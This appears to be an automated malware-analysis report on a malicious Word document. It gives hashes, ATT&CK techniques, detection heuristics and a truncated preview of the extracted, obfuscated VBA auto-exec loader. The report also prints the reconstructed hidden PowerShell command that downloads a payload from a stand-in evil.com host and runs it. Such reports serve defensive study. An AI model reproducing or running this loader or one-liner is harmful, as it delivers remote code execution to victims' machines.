Office (OLE) malware analysis — malicious · 8ef39d73b384ca63

MALICIOUS

Office (OLE)

140.0 KB Created: 2018-05-22 10:53:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 708ee578c10618683dfd3c1268b1ba57 SHA-1: 394ea1ebac7a2c8be7e50cefd9d4c87e6c7706fb SHA-256: 8ef39d73b384ca637be531ab5d3ee7dedafe3aa97ae51bb1391f8ffd7c94068b

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File

The sample contains critical heuristics indicating an obfuscated auto-exec VBA loader that uses Shell() calls. The VBA script attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The reconstructed PowerShell command is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')"', which strongly suggests a downloader functionality.

Heuristics 7

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 143421 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	143421 bytes
SHA-256: `70cdb765da4ff4f9e12ec79cb2d3cac32d982e8206a2439bd88c7a8f859432cf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jQVzALI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function uYCTrok() On Error Resume Next DrkBEVYv = (zVijGzSWC - CDbl(554336) + OBIlir + Fix(DAPhcIRMYKW / CLng(644221 * Sqr(YMcnGk))) - 5189 / Sin(atFvpwoUIXv - FJHRX - 672561 + CLng(wXNMUiowK)) * 739023 * Fix(554336)) zGzbMq = "viiqkfNJxUOk4& ((VArIFba' V1W4Vowershell IEx( (VzzYORMg67JJALnszy89pfZ10AJyS3Mgw" rrkIcU = CStr(Left(Right(zGzbMq, 50), 17)) + CStr(Left(Right(zGzbMq, 57), 2)) + CStr(Left(Right(zGzbMq, 68), 8)) ERzmSDYK = "viiqkfNraWk4dALzABLe aWfM1W4VPcvNVlyo3fpmYE" hKAZijX = CStr(Left(Right(ERzmSDYK, 28), 10)) + Left(Right(ERzmSDYK, 32), 1) + CStr(Left(Right(ERzmSDYK, 38), 4)) VjFZdj = "RBviiqkfNJxUOf).NAme[3'FbaXRV1W4,1cv" niRhZZF = Left(Right(VjFZdj, 23), 8) + CStr(Left(Right(VjFZdj, 15), 1)) + CStr(Left(Right(VjFZdj, 4), 2)) + CStr(Left(Right(VjFZdj, 14), 1)) twnbiwcrFDH = Chr(43) jlvrKpsl = (hJTfbsUzz - CDbl(681017) + iWBMhRLm + Fix(wiiMni / CLng(838516 * Sqr(tCwYCJRm))) - 49229 / Sin(FIHZVN - zEnChZ - 70080 + CLng(awCfpCD)) * 456389 * Fix(681017)) aWrdYtkA = "iqkfNJxUOf)CALzpEzoF'1,2]-JOInaWfVlyo(fpmYErUuVzaWORMg" UNAGbMzn = Left(Right(aWrdYtkA, 34), 12) + Left(Right(aWrdYtkA, 22), 1) + Left(Right(aWrdYtkA, 6), 2) + Left(Right(aWrdYtkA, 45), 2) + Left(Right(aWrdYtkA, 17), 1) jPzUbp = "RBviiqkfNJxUO(aWfD47nsaFbaXRV1W4adcv" ibUjfTF = Left(Right(jPzUbp, 23), 8) + CStr(Left(Right(jPzUbp, 15), 1)) + CStr(Left(Right(jPzUbp, 4), 2)) + CStr(Left(Right(jPzUbp, 14), 1)) SnXbkohu = "LzNaWfvii" kRfXk = CStr(Left(Right(SnXbkohu, 6), 2)) + CStr(Left(Right(SnXbkohu, 4), 1)) WChNJv = Chr(43) GZdPNiQmkbs = "dRBviiWfaWfsaOk4CALzp" TKoDEvbQM = Left(Right(GZdPNiQmkbs, 13), 5) + CStr(Left(Right(GZdPNiQmkbs, 15), 1)) + CStr(Left(Right(GZdPNiQmkbs, 14), 1)) XvdOswp = Chr(43) SwNdU = "dRBviiWfaWfdaOk4CALzp" suqFQwCkAi = Left(Right(SwNdU, 13), 5) + CStr(Left(Right(SwNdU, 15), 1)) + CStr(Left(Right(SwNdU, 14), 1)) tzori = Chr(43) tOtpB = (uwMSSjD - CDbl(553836) + zaSMNTPAhQr + Fix(iCAABaXq / CLng(518216 * Sqr(BXqbGdhdFh))) - 474816 / Sin(ZKwCkfKz - tjdwbqswMQ - 585953 + CLng(LMHzCclHph)) * 809822 * Fix(553836)) EPZDR = "RBviiqkfNJxUOaWf = &(BfFbaXRV1W4aWcv" thfjaiFiTA = Left(Right(EPZDR, 23), 8) + CStr(Left(Right(EPZDR, 15), 1)) + CStr(Left(Right(EPZDR, 4), 2)) + CStr(Left(Right(EPZDR, 14), 1)) uHBBmn = Chr(43) zmDvi = "LzNaW'vii" IlidwGzDMk = CStr(Left(Right(zmDvi, 6), 2)) + CStr(Left(Right(zmDvi, 4), 1)) wPuzf = Chr(43) tihRCRDoFY = "viiqkfNJxUO'fujnBuazoFbaXRVWW4" StCiIvG = CStr(Left(Right(tihRCRDoFY, 19), 7)) + Left(Right(tihRCRDoFY, 12), 1) + CStr(Left(Right(tihRCRDoFY, 3), 1)) + CStr(Left(Right(tihRCRDoFY, 25), 1)) PFLjJGkXHBY = Chr(43) qYjhAnWCiPa = (tZZGhT - CDbl(493373) + HrZYbil + Fix(EiXrmw / CLng(695218 * Sqr(hiiDZ))) - 449765 / Sin(APrSucbXDZB - SDIQAFCO - 343842 + CLng(SYGYoLrr)) * 411792 * Fix(493373)) mFcWKM = "LzNdaWfjiqkf" lwFrb = Left(Right(mFcWKM, 8), 3) + Left(Right(mFcWKM, 5), 1) RwEDmiPm = Chr(43) tqAaz = "LzNaWfvii" NVqaCM = CStr(Left(Right(tqAaz, 6), 2)) + CStr(Left(Right(tqAaz, 4), 1)) OQTlOjkML = Chr(43) wNktD = (oXpJiOrsL - CDbl(841761) + zuphtWakSQ + Fix(aWrqiwKM / CLng(359962 * Sqr(EZokqD))) - 609886 / Sin(qjfZviIzc - DIcnAam - 526574 + CLng(NBwSE)) * 382000 * Fix(841761)) QAhfOPPY = "LzNaW'vii" zaCanq = CStr(Left(Right(QAhfOPPY, 6), 2)) + CStr(Left(Right(QAhfOPPY, 4), 1)) cluKwQZWk = Chr(43) MSwzPKBWD = "viiqffNJx'fBujaLzpEzoWba" idcuK = CStr(Left(Right(MSwzPKBWD, 15), 5)) + Left(Right(MSwzPKBWD, 10), 1) + CStr(Left(Right(MSwzPKBWD, 3), 1)) + Left(Right(MSwzPKBWD, 20), 1) LQmHHISbDQ = Chr(43) WPsjw = "dRBviiWfaWfeaOk4CALzp" UIvDiCwnKR = Left(Right(WPsjw, 13), 5) + CStr(Left(Right(WPsjw, 15), 1)) + CStr(Left(Right(WPsjw, 14), 1)) wWnMBnOZwS = Chr(43) DiGTOonnYtS = "LzNaW'vii" lrJAiXTTTG = CStr(Left(Right(DiGTOonnYtS, 6), 2)) + CStr(Left(Ri ... (truncated)

SHA-256: 70cdb765da4ff4f9e12ec79cb2d3cac32d982e8206a2439bd88c7a8f859432cf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jQVzALI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uYCTrok()

On Error Resume Next
DrkBEVYv = (zVijGzSWC - CDbl(554336) + OBIlir + Fix(DAPhcIRMYKW / CLng(644221 * Sqr(YMcnGk))) - 5189 / Sin(atFvpwoUIXv - FJHRX - 672561 + CLng(wXNMUiowK)) * 739023 * Fix(554336))
zGzbMq = "viiqkfNJxUOk4& ((VArIFba' V1W4Vowershell  IEx( (VzzYORMg67JJALnszy89pfZ10AJyS3Mgw"
rrkIcU = CStr(Left(Right(zGzbMq, 50), 17)) + CStr(Left(Right(zGzbMq, 57), 2)) + CStr(Left(Right(zGzbMq, 68), 8))

ERzmSDYK = "viiqkfNr*aWk4dALzABLe aWf*M1W4VPcvNVlyo3fpmYE"
hKAZijX = CStr(Left(Right(ERzmSDYK, 28), 10)) + Left(Right(ERzmSDYK, 32), 1) + CStr(Left(Right(ERzmSDYK, 38), 4))

VjFZdj = "RBviiqkfNJxUOf).NAme[3'FbaXRV1W4,1cv"
niRhZZF = Left(Right(VjFZdj, 23), 8) + CStr(Left(Right(VjFZdj, 15), 1)) + CStr(Left(Right(VjFZdj, 4), 2)) + CStr(Left(Right(VjFZdj, 14), 1))

twnbiwcrFDH = Chr(43)
jlvrKpsl = (hJTfbsUzz - CDbl(681017) + iWBMhRLm + Fix(wiiMni / CLng(838516 * Sqr(tCwYCJRm))) - 49229 / Sin(FIHZVN - zEnChZ - 70080 + CLng(awCfpCD)) * 456389 * Fix(681017))
aWrdYtkA = "iqkfNJxUOf)CALzpEzoF'1,2]-JOInaWfVlyo(fpmYErUuVzaWORMg"
UNAGbMzn = Left(Right(aWrdYtkA, 34), 12) + Left(Right(aWrdYtkA, 22), 1) + Left(Right(aWrdYtkA, 6), 2) + Left(Right(aWrdYtkA, 45), 2) + Left(Right(aWrdYtkA, 17), 1)

jPzUbp = "RBviiqkfNJxUO(aWfD47nsaFbaXRV1W4adcv"
ibUjfTF = Left(Right(jPzUbp, 23), 8) + CStr(Left(Right(jPzUbp, 15), 1)) + CStr(Left(Right(jPzUbp, 4), 2)) + CStr(Left(Right(jPzUbp, 14), 1))

SnXbkohu = "LzNaWfvii"
kRfXk = CStr(Left(Right(SnXbkohu, 6), 2)) + CStr(Left(Right(SnXbkohu, 4), 1))

WChNJv = Chr(43)
GZdPNiQmkbs = "dRBviiWfaWfsaOk4CALzp"
TKoDEvbQM = Left(Right(GZdPNiQmkbs, 13), 5) + CStr(Left(Right(GZdPNiQmkbs, 15), 1)) + CStr(Left(Right(GZdPNiQmkbs, 14), 1))

XvdOswp = Chr(43)
SwNdU = "dRBviiWfaWfdaOk4CALzp"
suqFQwCkAi = Left(Right(SwNdU, 13), 5) + CStr(Left(Right(SwNdU, 15), 1)) + CStr(Left(Right(SwNdU, 14), 1))

tzori = Chr(43)
tOtpB = (uwMSSjD - CDbl(553836) + zaSMNTPAhQr + Fix(iCAABaXq / CLng(518216 * Sqr(BXqbGdhdFh))) - 474816 / Sin(ZKwCkfKz - tjdwbqswMQ - 585953 + CLng(LMHzCclHph)) * 809822 * Fix(553836))
EPZDR = "RBviiqkfNJxUOaWf = &(BfFbaXRV1W4aWcv"
thfjaiFiTA = Left(Right(EPZDR, 23), 8) + CStr(Left(Right(EPZDR, 15), 1)) + CStr(Left(Right(EPZDR, 4), 2)) + CStr(Left(Right(EPZDR, 14), 1))

uHBBmn = Chr(43)
zmDvi = "LzNaW'vii"
IlidwGzDMk = CStr(Left(Right(zmDvi, 6), 2)) + CStr(Left(Right(zmDvi, 4), 1))

wPuzf = Chr(43)
tihRCRDoFY = "viiqkfNJxUO'fujnBuazoFbaXRVWW4"
StCiIvG = CStr(Left(Right(tihRCRDoFY, 19), 7)) + Left(Right(tihRCRDoFY, 12), 1) + CStr(Left(Right(tihRCRDoFY, 3), 1)) + CStr(Left(Right(tihRCRDoFY, 25), 1))

PFLjJGkXHBY = Chr(43)
qYjhAnWCiPa = (tZZGhT - CDbl(493373) + HrZYbil + Fix(EiXrmw / CLng(695218 * Sqr(hiiDZ))) - 449765 / Sin(APrSucbXDZB - SDIQAFCO - 343842 + CLng(SYGYoLrr)) * 411792 * Fix(493373))
mFcWKM = "LzNdaWfjiqkf"
lwFrb = Left(Right(mFcWKM, 8), 3) + Left(Right(mFcWKM, 5), 1)

RwEDmiPm = Chr(43)
tqAaz = "LzNaWfvii"
NVqaCM = CStr(Left(Right(tqAaz, 6), 2)) + CStr(Left(Right(tqAaz, 4), 1))

OQTlOjkML = Chr(43)
wNktD = (oXpJiOrsL - CDbl(841761) + zuphtWakSQ + Fix(aWrqiwKM / CLng(359962 * Sqr(EZokqD))) - 609886 / Sin(qjfZviIzc - DIcnAam - 526574 + CLng(NBwSE)) * 382000 * Fix(841761))
QAhfOPPY = "LzNaW'vii"
zaCanq = CStr(Left(Right(QAhfOPPY, 6), 2)) + CStr(Left(Right(QAhfOPPY, 4), 1))

cluKwQZWk = Chr(43)
MSwzPKBWD = "viiqffNJx'fBujaLzpEzoWba"
idcuK = CStr(Left(Right(MSwzPKBWD, 15), 5)) + Left(Right(MSwzPKBWD, 10), 1) + CStr(Left(Right(MSwzPKBWD, 3), 1)) + Left(Right(MSwzPKBWD, 20), 1)

LQmHHISbDQ = Chr(43)
WPsjw = "dRBviiWfaWfeaOk4CALzp"
UIvDiCwnKR = Left(Right(WPsjw, 13), 5) + CStr(Left(Right(WPsjw, 15), 1)) + CStr(Left(Right(WPsjw, 14), 1))

wWnMBnOZwS = Chr(43)
DiGTOonnYtS = "LzNaW'vii"
lrJAiXTTTG = CStr(Left(Right(DiGTOonnYtS, 6), 2)) + CStr(Left(Ri
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.